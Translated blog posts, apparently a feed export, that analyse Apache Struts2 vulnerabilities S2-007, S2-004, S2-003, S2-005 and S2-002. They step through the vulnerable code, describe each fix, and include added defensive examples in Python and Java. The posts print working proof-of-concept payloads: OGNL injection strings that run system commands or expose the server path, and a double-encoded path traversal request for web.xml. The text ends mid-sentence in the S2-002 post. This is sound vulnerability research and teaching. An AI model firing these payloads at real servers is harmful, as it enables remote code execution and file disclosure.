<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201228145655095.png" alt="image-20201228145655095"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225155539404.png" alt="image-20201225155539404"></p>
<p>If we now set the <code>age</code> property to a string, a type conversion error is raised. Struts2 processes the user-supplied data and returns it to the user.</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225155827873.png" alt="image-20201225155827873"></p>
<p>It is in this processing that the <code>OGNL</code> expression injection lies. First set a breakpoint in the <code>ConversionErrorInterceptor:intercept()</code> method (<code>ConversionErrorInterceptor</code> is the interceptor dedicated to handling type conversion failures); when a type error occurs, execution enters here.</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225160842454.png" alt="image-20201225160842454"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225160414486.png" alt="image-20201225160414486"></p>
<p>When a type conversion error occurs, the program stores the user input in the <code>fakie</code> variable. Before storing it, the value is first processed by the <code>getOverrideExpr</code> method; let's follow that method.</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225161637883.png" alt="image-20201225161637883"></p>
<p>In the <code>getOverrideExpr</code> method, a single quote is appended on each side of the user input, and the value is then stored in the <code>fakie</code> variable. Our payload is wrapped in single quotes here, which explains why the payload takes the form <code>' + (*) + '</code>: it exists to escape from those single quotes.</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225161954632.png" alt="image-20201225161954632"></p>
<p>Next the program puts the <code>fakie</code> variable into <code>OgnlValueStack.overrides</code> via <code>setExprOverrides</code>.</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225162709287.png" alt="image-20201225162709287"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225164705641.png" alt="image-20201225164705641"></p>
<p>Then, when the Struts2 <code>/></code> tag is parsed, the user input is evaluated through <code>OGNL</code> and returned. If a related field was previously stored in <code>OgnlValueStack.overrides</code>, the value is first fetched from <code>OgnlValueStack.overrides</code> and then evaluated by <code>OGNL</code>.</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225172127453.png" alt="image-20201225172127453"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225172048324.png" alt="image-20201225172048324"></p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225172537185.png" alt="image-20201225172537185"></p>
<figure class="highlight purebasic"><table><tr><td class="code"><pre><span class="line"># Pop the calculator</span><br><span class="line">'+(<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,@java.lang.<span class="keyword">Runtime</span>@getRuntime().exec(<span class="string">"calc"</span>))+'</span><br><span class="line"></span><br><span class="line">'+(<span class="symbol">#_memberAccess</span>[<span class="string">"allowStaticMethodAccess"</span>]=true,<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,@java.lang.<span class="keyword">Runtime</span>@getRuntime().exec(<span class="string">"calc"</span>))+'</span><br><span class="line"></span><br><span class="line"># Get the absolute path</span><br><span class="line">'+(<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,<span class="symbol">#req</span>=@org.apache.struts2.ServletActionContext@getRequest(),<span class="symbol">#response</span>=<span class="symbol">#context</span>.get(<span class="string">"com.opensymphony.xwork2.dispatcher.HttpServletResponse"</span>).getWriter().write(<span class="symbol">#req</span>.getRealPath('/')))+'</span><br><span class="line"></span><br><span class="line">'+(<span class="symbol">#_memberAccess</span>[<span class="string">"allowStaticMethodAccess"</span>]=true,<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,<span class="symbol">#req</span>=@org.apache.struts2.ServletActionContext@getRequest(),<span class="symbol">#response</span>=<span class="symbol">#context</span>.get(<span class="string">"com.opensymphony.xwork2.dispatcher.HttpServletResponse"</span>).getWriter().write(<span class="symbol">#req</span>.getRealPath('/')))+'</span><br><span class="line"></span><br><span class="line"># Execute a system command and echo its output</span><br><span class="line">'+(<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,<span class="symbol">#response</span>=<span class="symbol">#context</span>.get(<span class="string">"com.opensymphony.xwork2.dispatcher.HttpServletResponse"</span>).getWriter().write(new java.util.Scanner(@java.lang.<span class="keyword">Runtime</span>@getRuntime().exec('whoami').getInputStream()).useDelimiter(<span class="string">"\\Z"</span>).next()))+'</span><br><span class="line"></span><br><span class="line">'+(<span class="symbol">#_memberAccess</span>[<span class="string">"allowStaticMethodAccess"</span>]=true,<span class="symbol">#context</span>[<span class="string">"xwork.MethodAccessor.denyMethodExecution"</span>]=false,<span class="symbol">#response</span>=<span class="symbol">#context</span>.get(<span class="string">"com.opensymphony.xwork2.dispatcher.HttpServletResponse"</span>).getWriter().write(new java.util.Scanner(@java.lang.<span class="keyword">Runtime</span>@getRuntime().exec('whoami').getInputStream()).useDelimiter(<span class="string">"\\Z"</span>).next()))+'</span><br></pre></td></tr></table></figure>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225172935494.png" alt="image-20201225172935494"></p>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>Fix</h4><p><code>org.apache.commons.lang.StringEscapeUtils.escapeJava()</code> is used to escape the value so that it can no longer break out of the quotes.</p>
<p><img src="/img/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225173722361.png" alt="image-20201225173722361"></p>
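<p>A model of the <code>getOverrideExpr</code> behaviour and of the fix, as an added Python example that is not Struts2's own code. It assumes the fixed variant wraps the escaped value in double quotes, since <code>escapeJava()</code> escapes double quotes and backslashes but leaves single quotes alone; <code>escape_java</code> is a minimal model of that library call, and <code>is_single_string_literal</code> is a hypothetical check that reports whether the override expression is still one quoted literal or whether the submitted value closed the quotes early.</p>

```python
"""Added example (not Struts2's own code): model of the S2-007 override
expression before and after the fix, with a check for whether the submitted
value still sits inside one quoted literal."""


def escape_java(value: str) -> str:
    """Minimal model of StringEscapeUtils.escapeJava(): backslash-escape
    double quotes, backslashes and control characters. Single quotes are
    deliberately left alone, as the real escapeJava() does."""
    out = []
    for ch in value:
        if ch in ('"', "\\"):
            out.append("\\" + ch)
        elif ch == "\n":
            out.append("\\n")
        elif ch == "\r":
            out.append("\\r")
        elif ch == "\t":
            out.append("\\t")
        elif ord(ch) < 0x20:
            out.append("\\u%04x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def get_override_expr_vulnerable(value: str) -> str:
    """Pre-fix behaviour described above: "'" + value + "'" with no escaping."""
    return "'" + value + "'"


def get_override_expr_fixed(value: str) -> str:
    """Fixed behaviour as modelled here (assumption): escapeJava() the value
    and wrap it in double quotes, the quote character escapeJava() escapes."""
    return '"' + escape_java(value) + '"'


def is_single_string_literal(expr: str) -> bool:
    """True if expr is exactly one quoted string literal (single or double
    quoted, backslash escapes honoured). False if the literal is closed
    early, leaving trailing expression text for OGNL, or never closed."""
    if len(expr) < 2 or expr[0] not in ("'", '"'):
        return False
    quote = expr[0]
    i = 1
    while i < len(expr):
        ch = expr[i]
        if ch == "\\":
            i += 2                      # escaped character, whatever it is
            continue
        if ch == quote:
            return i == len(expr) - 1   # closing quote must be the last char
        i += 1
    return False


def classify(value: str) -> dict:
    """Apply both variants to one submitted value and report whether the
    resulting override expression is still a harmless literal."""
    vuln = get_override_expr_vulnerable(value)
    fixed = get_override_expr_fixed(value)
    return {
        "vulnerable_expr": vuln,
        "vulnerable_is_literal": is_single_string_literal(vuln),
        "fixed_expr": fixed,
        "fixed_is_literal": is_single_string_literal(fixed),
    }


if __name__ == "__main__":
    # Constructed inputs: an ordinary non-numeric age, the simple PoC from
    # the post, and the same PoC rewritten with double quotes.
    for v in ("abc", "'+(#application)+'", '"+(#application)+"'):
        print(classify(v))
```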
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://xz.aliyun.com/t/7971" target="_blank" rel="noopener">https://xz.aliyun.com/t/7971</a></p>
<p><a href="https://cwiki.apache.org/confluence/display/WW/S2-007" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-007</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Struts2-004 Vulnerability Analysis</title>
<url>/2020/12/24/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>Vulnerability Summary</h4><p>See the official security bulletin: <a href="https://cwiki.apache.org/confluence/display/WW/S2-004" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-004</a></p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>Vulnerability Analysis</h4><p>An attacker can use a double-encoded URL with relative paths to traverse the directory structure and download files outside the "static" content folder.</p>
<a id="more"></a>
<p>From the official description we learn that the vulnerable class is the <code>FilterDispatcher</code> filter; the work is normally done in its <code>doFilter</code> method, so we set a breakpoint on <code>doFilter</code>.</p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223101612422.png" alt="image-20201223101612422"></p>
<p>When the <code>resourcePath</code> path is <code>/struts</code>, the <code>findStaticResource</code> method is called.</p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223102109094.png" alt="image-20201223102109094"></p>
<p>The static file being accessed must not end in <code>.class</code>; this restriction is actually of little use. The configured static file directories are then iterated over and <code>findInputStream</code> is called.<img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223103005752.png" alt="image-20201223103005752"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223102453441.png" alt="image-20201223102453441"></p>
<p>The requested path is concatenated with the directory, then URL-decoded, and then <code>getResourceAsStream</code> is called to read the file, which creates the directory traversal vulnerability.</p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223102649847.png" alt="image-20201223102649847"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223105441336.png" alt="image-20201223105441336"></p>
<p>POC:</p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">/struts/..%<span class="number">252f</span>/</span><br><span class="line">/struts/..%<span class="number">252f</span>..%<span class="number">252f</span>..%<span class="number">252f</span>WEB-INF/web.xml</span><br></pre></td></tr></table></figure>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>Fix</h4><p>The fix adds <code>cleanupPath</code>, <code>URL.getFile</code> and <code>endsWith</code> checks to restrict the resolved path.</p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224120316800.png" alt="image-20201224120316800"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224120423548.png" alt="image-20201224120423548"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224121310332.png" alt="image-20201224121310332"></p>
<p><img src="/img/Struts2-004-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201223105230910.png" alt="image-20201223105230910"></p>
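<p>The following is an added example, not code from this post or from Struts. It shows in plain Java what the analysis and fix above describe: decoding a request path a second time turns <code>..%252f</code> into <code>../</code>, and a resolver that refuses any still-encoded input, rejects <code>..</code> segments and verifies that the normalized path stays under the static root does not have this problem. The class name, method names and the static root <code>/opt/app/static/struts</code> are assumptions made for the example.</p>

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Added example (not Struts' FilterDispatcher): resolving a request for a static
 * resource without the S2-004 pattern of decoding after the check and concatenation.
 * Requires Java 10+ for URLDecoder.decode(String, Charset).
 */
public final class StaticResourceGuard {

    // Hypothetical static-content root; assumed for this example only.
    private static final Path STATIC_ROOT =
            Paths.get("/opt/app/static/struts").toAbsolutePath().normalize();

    /** What the vulnerable flow does: decode the already container-decoded path a second time. */
    static String decodedTwice(String rawRequestPath) {
        String afterContainer = URLDecoder.decode(rawRequestPath, StandardCharsets.UTF_8); // %252f -> %2f
        return URLDecoder.decode(afterContainer, StandardCharsets.UTF_8);                   // %2f -> /
    }

    /**
     * Maps a container-decoded request path to a file under STATIC_ROOT.
     * Returns null when the request must be refused.
     */
    static Path safeResolve(String requested) {
        if (requested == null || requested.isEmpty()) return null;
        // The container has already decoded once; a surviving '%' means a double-encoded
        // request. Refuse it instead of decoding again.
        if (requested.indexOf('%') >= 0) return null;
        if (requested.indexOf('\\') >= 0 || requested.indexOf('\0') >= 0) return null;
        for (String segment : requested.split("/")) {
            if (segment.equals("..") || segment.equals(".")) return null; // no traversal segments at all
        }
        Path candidate = STATIC_ROOT.resolve(requested.replaceFirst("^/+", "")).normalize();
        if (!candidate.startsWith(STATIC_ROOT)) return null;        // defence in depth after normalize
        if (candidate.toString().endsWith(".class")) return null;   // keep the original deny rule
        return candidate;
    }

    public static void main(String[] args) {
        String doubleEncoded = "/..%252f..%252fWEB-INF/web.xml";    // the PoC shape shown above
        String afterContainer = URLDecoder.decode(doubleEncoded, StandardCharsets.UTF_8);
        System.out.println("container sees : " + afterContainer);            // /..%2f..%2fWEB-INF/web.xml
        System.out.println("decoded twice  : " + decodedTwice(doubleEncoded)); // /../../WEB-INF/web.xml
        System.out.println("safeResolve    : " + safeResolve(afterContainer)); // null, refused
        System.out.println("safeResolve    : " + safeResolve("/js/utils.js")); // path under STATIC_ROOT
    }
}
```

<p>The order of operations is the whole point: validate what the container actually delivered, and never decode again afterwards. The <code>startsWith(STATIC_ROOT)</code> check after <code>normalize()</code> is a second line of defence in case a future change lets a traversal segment through the earlier checks.</p>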
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://aluvion.gitee.io/2020/07/16/struts2%E7%B3%BB%E5%88%97%E6%BC%8F%E6%B4%9E-S2-004/#%E5%89%8D%E8%A8%80" target="_blank" rel="noopener">https://aluvion.gitee.io/2020/07/16/struts2%E7%B3%BB%E5%88%97%E6%BC%8F%E6%B4%9E-S2-004/#%E5%89%8D%E8%A8%80</a></p>
<p><a href="https://xz.aliyun.com/t/7967" target="_blank" rel="noopener">https://xz.aliyun.com/t/7967</a></p>
<p><a href="https://cwiki.apache.org/confluence/display/WW/S2-004" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-004</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Struts2-003 and 005 Vulnerability Analysis</title>
<url>/2020/12/24/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h3 id="Struts2-003"><a href="#Struts2-003" class="headerlink" title="Struts2-003"></a>Struts2-003</h3><h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>Vulnerability Summary</h4><p>See the official security bulletin: <a href="https://cwiki.apache.org/confluence/display/WW/S2-003" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-003</a></p>
<p>POC:</p>
<figure class="highlight less"><table><tr><td class="code"><pre><span class="line"><span class="selector-tag">login</span><span class="selector-class">.action</span>?(<span class="string">'\u0023context[\'</span>xwork.MethodAccessor.denyMethodExecution\<span class="string">']\u003dfalse'</span>)(bla)(bla)<span class="selector-tag">&</span>(<span class="string">'\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\'</span>calc\<span class="string">')'</span>)(bla)(bla)</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<p>The S2-003 payload uses special characters, so an older Tomcat 6 is used for testing here.</p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">Newer Tomcat versions parse requests strictly according to RFC 3986, which permits only the letters a-zA-Z, the digits 0-9, the 4 special characters -_.~ and the reserved characters in a URL (RFC 3986 designates the following as reserved: ! * ' ( ) ; : @ & = + $ , / ? # [ ])</span><br><span class="line"></span><br><span class="line">On newer Tomcat versions, if any of the following characters is to be used in a URL it must be URL-encoded, otherwise a 400 status code is returned.</span><br><span class="line">^[]{}\|"<>`</span><br></pre></td></tr></table></figure>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>Vulnerability Analysis</h4><p>According to the official summary, the problem lies in ParameterInterceptors.java.</p>
<p>We therefore set a breakpoint on <code>doIntercept()</code>, the entry method of the <code>ParametersInterceptor</code> interceptor.</p>
<p>Before <code>getValueStack</code>, some initialization runs that sets <code>xwork.MethodAccessor.denyMethodExecution</code> to <code>true</code>. To be able to invoke methods, the first part of the PoC must set <code>denyMethodExecution</code> to <code>false</code>; only then is arbitrary code execution possible.</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222161256364.png" alt="image-20201222161256364"></p>
<p>Stepping into <code>setParameters(action, stack, parameters);</code>, this part takes the incoming parameters one by one through an iterator and processes each.</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222154340316.png" alt="image-20201222154340316"></p>
<p>Stepping into <code>acceptableName</code>, we find that this method checks whether the parameter name contains illegal characters, and <code>#</code> is among them, so the <code>payload</code> must encode <code>#</code> as <code>\u0023</code>. Once the check passes, <code>setValue</code> is called to add the value to the value stack.</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222155111292.png" alt="image-20201222155111292"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222155058451.png" alt="image-20201222155058451"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222162610882.png" alt="image-20201222162610882"></p>
<p>Stepping into <code>setValue</code>, we see that this method calls <code>Ognl.setValue()</code>.</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222154519290.png" alt="image-20201222154519290"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222160456612.png" alt="image-20201222160456612"></p>
<p><code>Ognl.setValue()</code> calls <code>compile</code> to parse the string, and while parsing the string the program decodes <code>\u</code> escape sequences.</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222160221068.png" alt="image-20201222160221068"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222174507709.png" alt="image-20201222174507709"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222174704079.png" alt="image-20201222174704079"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222181149389.png" alt="image-20201222181149389"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222182008083.png" alt="image-20201222182008083"></p>
<p>Control then returns to <code>Ognl.setValue()</code>, where the parsed expression is evaluated and executed.</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222164908265.png" alt="image-20201222164908265"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222165844689.png" alt="image-20201222165844689"></p>
<p>Because the filtering of special characters in parameter names is incomplete, <code>\u0023</code> (the hexadecimal escape for <code>#</code>) or the octal escape <code>\43</code> bypasses the regular expression, and the <code>OGNL</code> expression is executed.</p>
<h3 id="Struts2-005"><a href="#Struts2-005" class="headerlink" title="Struts2-005"></a>Struts2-005</h3><h4 id="漏洞概要-1"><a href="#漏洞概要-1" class="headerlink" title="漏洞概要"></a>Vulnerability Summary</h4><p>See the official security bulletin: <a href="https://cwiki.apache.org/confluence/display/WW/S2-005" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-005</a></p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">The S2-005 vulnerability originates from S2-003 (affected versions: below Struts 2.0.12). Struts2 parses every HTTP parameter name as an OGNL statement and executes it (think of it as Java code). OGNL expressions access Struts objects through #, and the Struts framework filtered the # character to prevent security problems, but the Unicode encoding (u0023) or the octal encoding (43) bypassed that restriction. For S2-003 the vendor's fix added security settings (disabling static method invocation, class method execution and so on), but those security settings could themselves be bypassed, which led to the vulnerability again: an attacker can use an OGNL expression to turn these options back on. The S2-003 fix put a lock on the door but left the key in the lock. (Quoted from 《白帽子讲Web安全》)</span><br></pre></td></tr></table></figure>
<p>POC:</p>
<figure class="highlight taggerscript"><table><tr><td class="code"><pre><span class="line">login.action?('<span class="symbol">\u</span>0023_memberAccess[<span class="symbol">\'</span>allowStaticMethodAccess<span class="symbol">\'</span>]')(meh)=true&(aaa)(('<span class="symbol">\u</span>0023context[<span class="symbol">\'</span>xwork.MethodAccessor.denyMethodExecution<span class="symbol">\'</span>]<span class="symbol">\u</span>003d<span class="symbol">\u</span>0023foo')(<span class="symbol">\u</span>0023foo<span class="symbol">\u</span>003dnew<span class="variable">%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1</span></span><br></pre></td></tr></table></figure>
<h4 id="漏洞分析-1"><a href="#漏洞分析-1" class="headerlink" title="漏洞分析"></a>Vulnerability Analysis</h4><p>S2-005 is a bypass of the S2-003 fix; compare the <code>ParametersInterceptor</code> source before and after.</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224161108681.png" alt="image-20201224161108681"></p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224161151927.png" alt="image-20201224161151927"></p>
<p>The vendor's fix added security settings such as disabling static method access (<code>allowStaticMethodAccess</code>) and class method execution (<code>MethodAccessor.denyMethodExecution</code>). Because these are ordinary values reachable from <code>OGNL</code>, an <code>OGNL</code> expression can change them and thereby bypass the fix.</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224162439935.png" alt="image-20201224162439935"></p>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>Fix</h4><p>A stricter regular expression, <code>[a-zA-Z0-9\\.\\]\\[\\(\\)_'\\s]+</code>, is now used to validate parameter names; it is a whitelist of permitted characters rather than a blacklist of forbidden ones.</p>
<p><img src="/img/Struts2-003%E3%80%81005%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224184426800.png" alt="image-20201224184426800"></p>
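<p>The following is an added example, not code from this post or from Struts. It covers both the S2-003 analysis (a blacklist on <code>#</code> that escape sequences slip past) and the S2-005 fix (the whitelist regex quoted above), by running a simplified stand-in for each check over a few parameter names. The class and method names are assumptions; <code>blacklistAccepts</code> is a one-line simplification of the pre-fix behaviour described above, not the real <code>acceptableName</code>.</p>

```java
import java.util.regex.Pattern;

/**
 * Added example (not Struts' ParametersInterceptor): why a character blacklist on
 * parameter names is bypassed by escape sequences, and how the whitelist regex from
 * the S2-005 fix handles the same inputs.
 */
public final class ParamNameValidator {

    /** Simplified stand-in for the pre-fix check: reject names that contain a literal '#'. */
    static boolean blacklistAccepts(String name) {
        return name != null && name.indexOf('#') < 0;
    }

    /** The stricter pattern quoted in the fix section, as a Java regex literal. */
    private static final Pattern STRICT =
            Pattern.compile("[a-zA-Z0-9\\.\\]\\[\\(\\)_'\\s]+");

    /** Post-fix behaviour: the whole name must consist of whitelisted characters. */
    static boolean whitelistAccepts(String name) {
        return name != null && STRICT.matcher(name).matches();
    }

    public static void main(String[] args) {
        // Constructed sample names. NOTE: javac translates \u0023 in *source* text (even
        // inside string literals) before compiling, so the backslash is doubled here to
        // keep the six literal characters "\u0023" in the runtime string.
        String[] names = {
            "user.name",                       // ordinary property name
            "#context",                        // literal '#', caught by both checks
            "\\u0023context",                  // hex escape: blacklist passes it, whitelist does not
            "\\43context",                     // octal escape: same outcome
            "('\\u0023context')(bla)(bla)",    // quotes and parentheses are allowed, the backslash is not
        };
        System.out.printf("%-32s %-10s %-10s%n", "name", "blacklist", "whitelist");
        for (String n : names) {
            System.out.printf("%-32s %-10b %-10b%n", n, blacklistAccepts(n), whitelistAccepts(n));
        }
    }
}
```

<p>The table this prints makes the design lesson concrete: the escaped forms pass the blacklist because the check runs before OGNL decodes <code>\u</code> and octal escapes, while the whitelist rejects them simply because a backslash is not a permitted character, with no need to anticipate every encoding.</p>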
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://xz.aliyun.com/t/7966" target="_blank" rel="noopener">https://xz.aliyun.com/t/7966</a></p>
<p><a href="https://xz.aliyun.com/t/2323" target="_blank" rel="noopener">https://xz.aliyun.com/t/2323</a></p>
<p><a href="https://mp.weixin.qq.com/s/xaVxdYPRIhlxiFLy9WhUHA" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/xaVxdYPRIhlxiFLy9WhUHA</a></p>
<p><a href="https://cwiki.apache.org/confluence/display/WW/S2-003" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-003</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Struts2-002 Vulnerability Analysis</title>
<url>/2020/12/24/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>Vulnerability Summary</h4><p>See the official security bulletin: <a href="https://cwiki.apache.org/confluence/display/WW/S2-002" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-002</a></p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>Vulnerability Analysis</h4><p>From the official security bulletin we know roughly that the problem lies in the <code><s:url></code> and <code><s:a></code> tags. Our <code>index.jsp</code> is as follows:</p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line"><%@ taglib prefix=<span class="string">"s"</span> uri=<span class="string">"/struts-tags"</span> %></span><br><span class="line"><%@ page contentType=<span class="string">"text/html;charset=UTF-8"</span> language=<span class="string">"java"</span> %></span><br><span class="line"><html></span><br><span class="line"> <head></span><br><span class="line"> <meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html; charset=UTF-8"</span>></span><br><span class="line"> <title>s2-002</title></span><br><span class="line"> </head></span><br><span class="line"> <body></span><br><span class="line"> <h2>s2-002 demo</h2></span><br><span class="line"> <p>link: <a href=<span class="string">"https://cwiki.apache.org/confluence/dispaly/WW/S2-002"</span>></span><br><span class="line"> </a>https://cwiki.apache.org/confluence/dispaly/WW/S2-002 </p></span><br><span class="line"> <s:url action="login" includeParams="all" ></s:url></span><br><span class="line"> </body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<p>Since all S2 tag library classes inherit from <code>ComponentTagSupport</code>, and <code>doStartTag</code> is implemented in that class, we set a breakpoint directly on the <code>doStartTag</code> method of <code>ComponentTagSupport</code>. First let's look at <code>doStartTag</code>:</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201220160944540.png" alt="image-20201220160944540"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201220161002678.png" alt="image-20201220161002678"></p>
<p>Since we are handling the <code>s:url</code> tag here, the component that processes the tag, <code>this.component</code>, is an instance of <code>org.apache.struts2.components.URL</code>. We step into <code>URL:start()</code>.</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221141410686.png" alt="image-20201221141410686"></p>
<p>In <code>URL:start()</code> we see that when <code>includeParams=all</code>, <code>mergeRequestParameters</code> is called.</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221141714877.png" alt="image-20201221141714877"></p>
<p>In <code>mergeRequestParameters</code>, the program stores the key/value pairs obtained from <code>this.req.getParameterMap()</code> into the <code>this.parameters</code> property.</p>
<p><code>getParameterMap()</code> returns the request parameters as a map. For the request</p>
